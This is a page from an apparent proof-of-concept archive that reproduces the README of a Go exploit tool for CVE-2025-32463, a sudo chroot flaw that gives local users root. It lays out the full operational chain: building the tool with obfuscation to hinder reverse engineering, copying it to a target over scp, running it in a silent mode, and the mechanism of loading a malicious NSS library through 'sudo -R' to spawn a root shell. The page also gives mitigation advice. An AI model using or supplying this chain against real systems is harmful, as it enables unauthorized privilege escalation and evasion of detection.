Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-32463 PoC — Sudo 安全漏洞

Source
https://github.com/Nowafen/CVE-2025-32463
Associated Vulnerability
Title:Sudo 安全漏洞 (CVE-2025-32463)
Description:Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
Description
This CVE addresses a vulnerability in sudo versions 1.9.14 to 1.9.17, enabling unauthorized local privilege escalation to root access.
Readme
## CVE-2025-32463 Exploit Tool
This repository contains a Go-based exploit tool for **CVE-2025-32463**, a critical privilege escalation vulnerability (CVSS 9.3) in sudo versions **1.9.14 to 1.9.17**.  
The tool allows local users to gain root access by exploiting a flaw in the `--chroot (-R)` option of sudo.  
This tool is intended for **educational and testing purposes only in controlled, isolated environments**.

>  **Warning**: Use this tool only in environments where you have **explicit permission** to test (e.g., virtual machines or lab setups). Unauthorized use on systems you do not own is **illegal and unethical**. Always take **snapshots** of your testing environment and **update sudo after testing**.

---

### Prerequisites

To use this tool, ensure the following are installed on your system:

- **Go**: Version 1.2 or higher  
  `sudo apt install golang`  
- **gcc**: For compiling the malicious C library  
  `sudo apt install gcc`  
- **libc-dev**: For C library headers  
  `sudo apt install libc-dev`  
- **sudo**: Version between 1.9.14 and 1.9.17 
- **User Permissions**: A non-privileged user with sudo access and `--chroot (-R)` allowed  
- **No Security Restrictions**: SELinux/AppArmor must not block shared library loading  

---

## Setup Instructions

Follow these steps to clone, compile, obfuscate, and deploy the tool securely.

### 1. Clone the Repository

```bash
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
```

---

### 2. Secure Compilation

To make reverse engineering difficult, we recommend compiling the binary with obfuscation using `garble` or optimizing Go build flags.

#### Option : Basic Compilation

```bash
go build -o exploit
```

#### Option : Obfuscated Compilation with Garble

```bash
go install mvdan.cc/garble@latest
garble -tiny -literals -seed=random build -o exploit
```

- `-tiny`: Minimizes debug information.  
- `-literals`: Obfuscates string literals.  
- `-seed=random`: Randomizes obfuscation for uniqueness.  

#### Option : Optimized Go Build

```bash
go build -ldflags="-s -w" -o exploit
```

- `-s`: Strips symbol table.  
- `-w`: Strips DWARF debugging info.  

---

### 3. Deploy to Target System

#### Create a Test User (on the target system)

```bash
sudo adduser --home /home/testuser --shell /bin/bash testuser
sudo usermod -aG sudo testuser
```

> Ensure `--chroot (-R)` is not restricted in `/etc/sudoers`.

#### Transfer the Binary

```bash
scp exploit testuser@target:/home/testuser/exploit
```

#### Install Dependencies on Target

```bash
sudo apt update
sudo apt install gcc libc-dev
```

---

### 4. Run the Exploit

Run the binary as the non-privileged user on the target system. Available flags:

- `--help`: Show detailed usage instructions.  
- `--about`: Display CVE details.  
- `--execution`: Execute the exploit.  
- `--silent`: Run silently without logo or process output (requires `--execution`).  

#### Examples

**Show Help:**
```bash
./exploit --help
```

**Show CVE Details:**
```bash
./exploit --about
```

**Run Exploit (Normal Mode):**
```bash
./exploit --execution
```

Followed by a **root shell (`#` prompt)**.

**Run Exploit (Silent Mode):**
```bash
./exploit --execution --silent
```

> Output: None (except the root shell if successful)
---

### 5. Verify Success

In the root shell, check for root access:

```bash
id
whoami
```

**Expected Output:**
```
uid=0(root) gid=0(root) groups=0(root),1001(testuser)
root
```

---

## How It Works

The tool exploits CVE-2025-32463 by:

1. Creating a temporary directory `/tmp/sudowoot.stage.*`.
2. Generating a malicious C library `woot1337.c` that sets `uid=0`, `gid=0`, and executes `/bin/bash`.
3. Setting up a fake chroot environment with `nsswitch.conf` and `/etc/group`.
4. Compiling the C code into a shared library `libnss_/woot1337.so.2`.
5. Running `sudo -R woot woot` to load the malicious library and gain a root shell.
6. Cleaning up temporary files automatically.

> Requires: Vulnerable sudo version (1.9.14 - 1.9.17), gcc, libc-dev, and sudo -R permissions.

---

## Safety Precautions

- **Isolated Environment**: Run only in a VM or Docker container (e.g., clone PoC image from `pr0v3rbs/CVE-2025-32463_chwoot`).  
- **Snapshot**: Take a VM snapshot before testing to revert changes.  
- **Update After Testing**:  
  ```bash
  sudo apt update
  sudo apt install sudo
  ```

- **Disable Chroot** (if update not possible):  
  ```bash
  echo "Defaults !use_chroot" | sudo tee -a /etc/sudoers
  ```

---

## References

- [NVD - CVE-2025-32463](https://nvd.nist.gov/vuln/detail/CVE-2025-32463)
- [github.com/kh4sh3i](https://github.com/kh4sh3i/CVE-2025-32463)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →